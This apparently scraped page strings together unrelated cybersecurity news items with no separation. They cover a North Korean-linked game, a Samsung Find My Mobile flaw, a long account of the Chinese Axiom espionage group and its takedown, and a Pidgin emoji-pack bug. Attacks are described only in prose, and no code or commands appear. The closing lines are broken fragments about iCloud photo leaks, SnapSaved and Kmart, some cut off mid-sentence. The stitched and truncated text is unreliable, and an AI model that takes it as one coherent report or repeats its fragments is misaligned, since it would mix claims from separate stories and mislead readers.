However, nknews.org recently reported on a mobile game that does originate from North Korea. Nice Pigs is alleged to have been created by a North Korean citizen living abroad to gain IT training that will help the country. There's no suggestion that Nice Pigs contained malware, but it does show that there are app developers working for the North Korea government.
North Korea has consistently denied launching cyberattacks on South Korea. Instead, it says that any reports of the country's hacker army are fabrications intended to increase tension on the border between the countries.
A security researcher has discovered a vulnerability in Samsung's "Find My Mobile" feature that could let hackers interfere with phones over the internet.
The Find My Mobile service lets Samsung customers track their devices, and lock or erase them if they get stolen. However, The Register reports that Mohamed Baset discovered that Samsung doesn't properly check where requests to Find My Mobile come from. This means that hackers can impersonate the device owners and interfere with the account.
So what can hackers do with this security flaw? They can display a customized message on the phone screen, or find the phone's most recent location on a map. A hacker who attacked someone through the service could also force phones to ring on full volume for a minute, or even erase all data on the phone.
In an email to Business Insider, Samsung acknowledged the security flaw, but claimed that it had been fixed with a security patch on October 13.
Baset uploaded a video to YouTube showing just how easy it is to hack into Samsung phones using Find My Mobile.
The National Institute of Standards and Technology examined the hack, and issued this statement:
The Remote Controls feature on Samsung mobile devices does not validate the source of lock-code data received over a network, which makes it easier for remote attackers to cause a denial of service (screen locking with an arbitrary code) by triggering unexpected Find My Mobile network traffic.
A Chinese intelligence unit carried out a massive cyber espionage program that stole vast quantities of data from governments, businesses and other organizations, security analysts who uncovered the operation said Thursday.
The activities of the Chinese unit called the Axiom group began at least six years ago and were uncovered by a coalition of security firms this month.
Cyber sleuths traced Axiom attacks to the 2009 cyber operation against Google in China and other US companies known as Operation Aurora.
The group was also linked to a Chinese hacking program that targeted dissidents and opposition groups known as GhostNet. More recent Axiom attacks took place against Japan, the US Veterans of Foreign Wars, and US think tanks.
In the past two weeks, 43,000 computer networks at nearly 1,000 organizations were cleaned of multiple types of cyber espionage spyware from Axiom cyber spies, including 180 highly sophisticated computer penetrations at key Chinese targets that employed a program called Hikit that specializes in automated data theft.
Investigators found that the Chinese used up to four different types of malicious software in a single information-stealing operation, and a total nine different types of spying malware overall, ranging from rudimentary to very sophisticated.
The group conducting the attacks is “a truly advanced hacker,” said Zachery Hanif, a cyber security expert with Novetta, a Virginia-based company that was one of the first to identify Axiom cyber attacks.
“We believe they are a highly sophisticated and very prolific cyber espionage team,” Hanif said in an online briefing for reporters. “We certainly have a moderate to high degree of confidence that the [Axiom] tasking is part of the Chinese intelligence apparatus.”
An FBI alert issued Oct. 15 bolsters the commercial findings. The alert states that the Bureau has high confidence that the new unit is “a group of Chinese government affiliated cyber actors who routinely steal high value information from US commercial and government networks through cyber espionage.”
The FBI said the new group differs from the Chinese military hacking unit known as PLA Unit 61398 by operating in an “exceedingly stealthy and agile” fashion, compared to the military unit.
“This Chinese government affiliated group previously documented by private sector reports by the names of Operation Deputy Dog, Snowman, Ephemeral Hydra, APT17, Bit9, Google security alerts and parts of Hidden Lynx, has heavily targeted the high tech information technology industry including microchip, digital storage and networking equipment manufacturers, as well as defense contractors in multiple countries and multinational corporations,” the FBI said.
Hanif said attributing the Axiom spying to a specific Chinese intelligence agency is difficult because of problems involved in making direct attributions in cyberspace to specific actors.
But during the briefing Hanif said indicators of Axiom revealed activities that were aligned with Chinese government five-year economic and technological development plans.
Hanif said detailed analysis of software and digital attack methods of the group against specific targets reveals the activities are “heavily aligned with what’s been published as strategic interests for the Chinese government.”
China’s targets included Asia and western governments, specifically communications agencies, aerospace and space research, law enforcement, personnel management, and government auditing and internal affairs.
Using proxy servers in Hong Kong, Taiwan, Japan, South Korea, the United States and Europe, Axiom cyber spies sought data and technology form the following targets:
♦ Electronics and integrated circuits
♦ Network equipment manufacturers
♦ Internet service companies
♦ Software vendors
♦ News media and journalism organizations
♦ Non-governmental organizations
♦ International consulting and analysis firms
♦ International law firms
♦ Telecommunications firms
♦ Manufacturing conglomerates
♦ Venture capital firms
♦ Energy companies
♦ Meteorological services
♦ Cloud computing firms
♦ Pharmaceutical firms; and
♦ US academic institutions
Axiom is the first published disclosure of civilian Chinese cyber spying.
A Chinese military intelligence group known as the Third Department of the People’s Liberation Army has been identified in the past as directing major Chinese cyber spying units in U.S. cyber attacks.
Analysis of Axiom’s activities reveals that new unit is likely a part of China’s Ministry of State Security (MSS), the powerful Communist Party-controlled political police and intelligence service that was modeled after the Soviet Union’s KGB.
A Novetta report on Axiom said the group conducted cyber operations against perceived opponents of the Beijing regime located both abroad and in China–key indicators of MSS sponsorship.
The report did not identify specific victims but published reports going back to 2009, as well as the attacks on Google and other U.S. companies, reveal that many of the companies were Fortune 500 firms.
US government agencies that were hacked by the Chinese also were not identified.
To highlight the sophistication of the group, the Novetta report reveals Axiom employed six different types of cyber intelligence specialties: reconnaissance specialists, initial cyber break-in experts, specialists who navigated within targeted networks, experts who set up special systems inside compromised networks, information specialists who identified and stole data, and those who helped maintain clandestine access over long periods of time.
Brian Bartholomew, a cyber security expert with iSight Partners, a company that took part in a coalition of security firms that exposed and countered Axiom operations, said beginning in mid-October that the group launched an effort to expunge Axiom’s malware in an effort to degrade the group’s activities.
“The hope was to throw a large wrench into their engine, and cause them to take the time to basically take a step back and hit the reboot button and spend a large amount of resources to fix things and get back up and running,” Bartholomew said.
Security firms involved in the counter-Axiom effort, dubbed Operation SMN, included the security firms Bit9, Cisco Systems, F-Secure, FireEye, Tenable, ThreatConnect, ThreatTrack, and Volexity, in addition to Novetta and iSight.
The joint efforts of the group effort were successful in rooting out a lot of Axiom malware, Bartholomew said.
As a result, the Chinese cyber unit is now being forced to develop new malware and to find new compromised networks that it can use as proxies, along with developing new victims to target, he said.
The companies and entities that were infected by the Chinese malware were notified of the Axiom attack.
Security researchers at Cisco discovered a vulnerability in a popular messaging client that allowed hackers to use malicious emoji and mess with the files on a computer.
A bug in Pidgin's code meant that hackers could sneak instructions into a pack of emoji. Anybody downloading new smiley faces to use for chat could have been letting hackers modify files on their computer, or even create new ones.
Pidgin released a security update that fixed the security bug, but it is unknown whether any hackers took advantage of it.
This wasn't the first time a vulnerability has been found in emoji. A similar bug was discovered in the same chat client in 2012.
Hackers looking to gain access to a computer can use bundles of emoji to sneak in extra files. While that might sound bizarre, it's actually part of a common hacker tactic.
Hackers often trick users into downloading files, disguising them as legitimate software downloads. Then, once the files have been downloaded, the user has to approve their installation. Most people don't check too closely when installing new programs, and so they regularly grant new apps and programs access to important parts of their computer.
That is exactly what happened with the recent iWorm bug, which spread to more than 17,000 Mac computers. It was reported that the virus spread through fake Adobe Photoshop downloads uploaded to popular file-sharing site The Pirate Bay.
When it comes to emoji, we are used to installing and downloading new bundles of colourful graphics. Whether through a new iOS release, updated Facebook stickers, or a bundle of faces for a chat program, everyone from parents to young children knows to click a download button and install emoji. And if programs have security breaches, that's exactly how hackers can access computers.
Some dealers say the celebrity-photo-trading industry died on the afternoon of Labor Day 2014. An 
No male celebrities are known to have been specifically targeted by the iCloud hackers, instead their photos usually turn up by accident.
“We’re already seeing a lot of these spam emails and texts and phone calls as a result of previous breaches, so this is just going to add to it,” Litan says. “All the data is being collected and sold on the black market, and different criminals buy it for different reasons.”
Report suspicious activity
SnapSaved disappeared several months ago. 
Kmart on Friday 
